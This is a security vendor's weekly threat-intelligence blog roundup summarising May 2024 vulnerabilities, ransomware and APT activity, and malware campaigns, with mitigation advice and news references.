May 24: Top Threat Actors, Malware, Vulnerabilities and Exploits

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

Welcome to Picus Security's weekly cyber threat intelligence roundup! 

Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.

Our new threat intelligence tool will enable you to identify threats targeting your region and sector, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.

May 24: Latest Vulnerabilities, Exploits and Patches

Here are the most notable vulnerabilities and exploitations observed from May 17 to May 23, 2024.

CVE-2023-43208: CISA Warning About NextGen Healthcare Mirth Connect Deserialization of Untrusted Data Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about active exploitation of a security flaw in NextGen Healthcare's Mirth Connect [1], adding it to the Known Exploited Vulnerabilities (KEV) catalog. Mirth Connect, an open-source data integration platform, facilitates standardized data exchange between healthcare systems and is widely used in the healthcare sector. The vulnerability, tracked as CVE-2023-43208 [2], involves unauthenticated remote code execution stemming from an incomplete patch for CVE-2023-37679, which has a CVSS score of 9.8. This flaw is linked to the insecure use of the Java XStream library for unmarshalling XML payloads, making it easily exploitable. 

While the nature and timing of the attacks remain unclear, Microsoft has observed both nation-state and cybercrime actors exploiting these vulnerabilities for initial access in Q1 2024. To mitigate risks, CISA mandates federal agencies to update to Mirth Connect version 4.4.1 or later by June 10, 2024. 

CVE-2014-100005 & CVE-2021-40655: CISA Warns of Exploited Vulnerabilities in EOL D-Link Products

CISA has added two vulnerabilities in discontinued D-Link products to its Known Exploited Vulnerabilities (KEV) Catalog [3]. 

The first, CVE-2014-100005, affects legacy D-Link routers with cross-server request forgery (CSRF) flaws, allowing attackers to alter device configurations remotely.  The second, CVE-2021-40655, impacts D-Link DIR-605 routers and allows information disclosure through forged POST requests, exposing login credentials in plain text. 

Both vulnerabilities affect routers that have reached End-Of-Life (EOL) status. Federal agencies are urged to address these issues by June 6, 2024, as part of the Binding Operational Directive (BOD) 22-01.

MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks

An unknown threat actor is exploiting ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) in Microsoft Exchange Server to deploy keylogger malware targeting entities in Africa and the Middle East [4]. Identified by Positive Technologies, the attack affects over 30 victims, including government agencies, banks, IT companies, and educational institutions, with initial compromises dating back to 2021. The keylogger collects account credentials by injecting code into the server’s main page, "logon.aspx."

Countries targeted include Russia, the U.A.E., Kuwait, and several others. Organizations are advised to update their Exchange Servers and check for signs of compromise, particularly in the "clkLgn()" function of the "logon.aspx" file.

Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager

Ivanti has released patches for multiple critical security vulnerabilities in its Endpoint Manager (EPM) that could allow remote code execution [5]. 

Six of these flaws (CVE-2024-29822 to CVE-2024-29827) are SQL injection vulnerabilities with a CVSS score of 9.6, enabling unauthenticated attackers on the same network to execute arbitrary code [6]. 

The remaining four vulnerabilities (CVE-2024-29828 to CVE-2024-29830, and CVE-2024-29846) require attacker authentication and have a CVSS score of 8.4. Additionally, a high-severity flaw (CVE-2024-29848) in Avalanche version 6.4.3.602 has been addressed. Ivanti assures that there is no evidence of these vulnerabilities being exploited in the wild.

May 24: Top Threat Actors Observed In Wild

Here are the top threat actors observed from May 17 to May 23, 2024.

LockBit Ransomware Gang Claims Responsibility for London Drugs Cyberattack and Threatens Data Leak

  • Victim Organization: London Drugs
  • Victim Location: Canada
  • Sectors: Pharmacy
  • Threat Actor: LockBit
  • Threat Actor Aliases: LockBitSupp
  • Actor Motivation: Financial Gain

The LockBit ransomware gang has claimed responsibility for the April 28 cyberattack on Canadian pharmacy chain London Drugs [7], which led to the temporary closure of all its retail stores across Western Canada. Although London Drugs reported no evidence of compromised customer or employee data, LockBit threatens to publish allegedly stolen data online following failed ransom negotiations. London Drugs, which employs over 9,000 people, has reopened its stores but continues to experience website issues. LockBit's extortion demands included a $25 million ransom. In response, London Drugs has notified employees and offered complimentary credit monitoring and identity theft protection services. The LockBit ransomware operation, known for targeting high-profile organizations globally, remains active despite recent law enforcement takedowns and significant operational disruptions.

Operation Diplomatic Specter: Chinese APT Group Targets Government Entities in Espionage Campaign

  • Victim Industry & Operations: Diplomatic and economic missions, embassies, military operations, political meetings, and ministries
  • Victim Location: Middle East, Africa, and Asia
  • Threat Actor: TGR-STA-0043
  • Threat Actor Aliases: Operation Diplomatic Specter
  • Malware: TunnelSpecter Backdoor, SweetSpecter Backdoor (variants of Gh0st RAT)
  • CVE: ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), ProxyLogon (CVE-2021-26855)

Chinese APT group, codenamed TGR-STA-0043, has been conducting cyber espionage operations targeting governmental entities in the Middle East, Africa, and Asia since late 2022 [8]. Known as Operation Diplomatic Specter, the group focuses on diplomatic and economic missions, embassies, military operations, political meetings, and ministries. They utilize rare email exfiltration techniques and backdoors like TunnelSpecter and SweetSpecter, variants of the Gh0st RAT.

Initial access is often gained through exploiting known Exchange server vulnerabilities such as ProxyLogon and ProxyShell. The group closely monitors geopolitical developments, exfiltrating sensitive information related to military and diplomatic activities. Their methods and infrastructure show clear links to other Chinese state-aligned groups like APT27, Mustang Panda, and Winnti.

Threat Actor Chucky Claims Knowmad Mood Data Breach via LeakBase

  • Victim Organization: Knowmad Mood
  • Victim Location: Spain, Italy, Portugal, United States, Morocco, United Kingdom, Uruguay
  • Threat Actor: Chucky, LeakBase
  • Threat Actor Aliases: Sqlrip, Chuckies
  • Actor Motivation: Cyber Espionage

The threat actor Chucky, owner of the cybercrime forum LeakBase, has claimed responsibility for a data breach at Spanish IT services company Knowmad Mood [9]

The breach, allegedly stemming from the company's CRM system, includes sensitive employee data such as names, email addresses, and performance metrics. Knowmad Mood, formerly atSistemas, provides consulting and software development services across several countries. Screenshots shared by Chucky on LeakBase revealed a cache of files, including HTML, Excel, and Word documents. Chucky, known for previous breaches and operating under various aliases, gained prominence in the cybercriminal community following the shutdown of BreachForums. The stolen data raises significant security concerns for Knowmad Mood's employees and customers.

May 24: Latest Malware Attacks

Here are the malware attacks and campaigns that were active in the third week of May.

MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel

  • Victim Location: Albania, Israel
  • Sectors: Government, Technology
  • Threat Actor: Iranian MOIS
  • Threat Actor Aliases: Homeland Justice, Karma, Storm-0842, Void Manticore
  • Actor Motivation: Destructive Attack
  • Malware: Cl Wiper, No-Justice, BiBi, Karma Shell
  • CVEs: CVE-2019-0604

Iranian MOIS-linked hackers, tracked as Void Manticore (also known as Storm-0842 by Microsoft), are responsible for destructive wiper malware attacks on Albania and Israel [10]. Operating under the aliases Homeland Justice and Karma, the group has conducted attacks since July 2022, using custom wiper malware such as Cl Wiper, No-Justice, and BiBi. Their tactics involve exploiting known vulnerabilities in internet-facing applications (e.g., CVE-2019-0604) to gain initial access, followed by lateral movement using RDP, SMB, and FTP. 

The group often uses web shells, including a custom one named Karma Shell. The operations show a high level of coordination with another Iranian threat actor, Scarred Manticore (Storm-0861), highlighting a systematic handoff procedure. This collaboration was previously noted by Microsoft, with multiple Iranian actors participating in distinct attack phases. Void Manticore's dual approach combines psychological warfare with data destruction, amplifying the impact on targeted organizations.

Advanced Cryptojacking Campaign REF4578 Exploits Vulnerable Drivers to Evade Detection and Escalate Privileges

  • Victim Location: China, Hong Kong, Netherlands, Japan, United States, Germany, South Africa, Sweden
  • Sectors: Energy, Financial, Government
  • Actor Motivation: Financial Gain
  • Threat Campaign Name: REF4578 (also known as HIDDEN SHOVEL)
  • Malware: GHOSTENGINE payload, XMRig

Researchers uncovered a sophisticated cryptojacking campaign, dubbed REF4578 (also known as HIDDEN SHOVEL) [11], leveraging Bring Your Own Vulnerable Driver (BYOVD) techniques to exploit signed drivers with known vulnerabilities. This campaign employs the GHOSTENGINE payload to disable security solutions, ensuring evasion and privilege escalation. 

Initial access is gained via a deceptive executable, "Tiworker.exe," which runs a PowerShell script retrieving further malicious scripts from a command-and-control (C2) server. The campaign predominantly targets servers in China, but impacts have also been observed in other countries. Key components include vulnerable drivers like "aswArPot.sys" and "IObitUnlockers.sys" for terminating EDR processes and deleting security agents, respectively. The core payload, "smartsscreen.exe," deactivates security processes and executes the XMRig miner, directing mined cryptocurrency to the attackers' wallets. 

To counter this campaign, security teams should monitor for unusual PowerShell activity, suspicious processes, and network traffic related to crypto-mining pools, and utilize YARA rules to detect GHOSTENGINE infections.

References

[1] “CISA Adds Two Known Exploited Vulnerabilities to Catalog,” Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/alerts/2024/05/20/cisa-adds-two-known-exploited-vulnerabilities-catalog. [Accessed: May 23, 2024]

[2] N. Sunkavally, “NextGen Mirth Connect Remote Code Execution Vulnerability (CVE-2023-43208),” Horizon3.ai, Oct. 25, 2023. Available: https://www.horizon3.ai/attack-research/attack-blogs/nextgen-mirth-connect-remote-code-execution-vulnerability-cve-2023-43208/. [Accessed: May 23, 2024]

[3] I. Arghire, “CISA Warns of Exploited Vulnerabilities in EOL D-Link Products,” SecurityWeek, May 17, 2024. Available: https://www.securityweek.com/cisa-warns-of-exploited-vulnerabilities-in-eol-d-link-products/. [Accessed: May 23, 2024]

[4] 2024 newsroom May 22, “MS Exchange Server Flaws Exploited to Deploy Keylogger in Targeted Attacks,” The Hacker News, May 22, 2024. Available: https://thehackernews.com/2024/05/ms-exchange-server-flaws-exploited-to.html. [Accessed: May 23, 2024]

[5] 2024 newsroom May 23, “Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager,” The Hacker News, May 23, 2024. Available: https://thehackernews.com/2024/05/ivanti-patches-critical-remote-code.html. [Accessed: May 23, 2024]

[6] “Ivanti Community.” Available: https://forums.ivanti.com/s/article/KB-Security-Advisory-EPM-May-2024?language=en_US. [Accessed: May 23, 2024]

[7] S. Gatlan, “LockBit says they stole data in London Drugs ransomware attack,” BleepingComputer, May 21, 2024. Available: https://www.bleepingcomputer.com/news/security/lockbit-says-they-stole-data-in-london-drugs-ransomware-attack/. [Accessed: May 23, 2024]

[8] 2024newsroom May 23, “Inside Operation Diplomatic Specter: Chinese APT Group’s Stealthy Tactics Exposed,” The Hacker News, May 23, 2024. Available: https://thehackernews.com/2024/05/inside-operation-diplomatic-specter.html. [Accessed: May 23, 2024]

[9] J. Alan, “Threat Actor Chucky, Owner of LeakBase Claims Knowmad Mood Data Breach,” The Cyber Express, May 20, 2024. Available: https://thecyberexpress.com/chucky-leakbase-knowmad-mood-data-breach/. [Accessed: May 23, 2024]

[10] 2024 newsroom May 20, “Iranian MOIS-Linked Hackers Behind Destructive Attacks on Albania and Israel,” The Hacker News, May 20, 2024. Available: https://thehackernews.com/2024/05/iranian-mois-linked-hackers-behind.html. [Accessed: May 23, 2024]

[11] J. Alan, “New Cryptojacking Campaign Exploits Vulnerable Drivers to Evade Security and Gain Privileges,” The Cyber Express, May 22, 2024. Available: https://thecyberexpress.com/ghostengine-campaign-exploits-drivers/. [Accessed: May 23, 2024]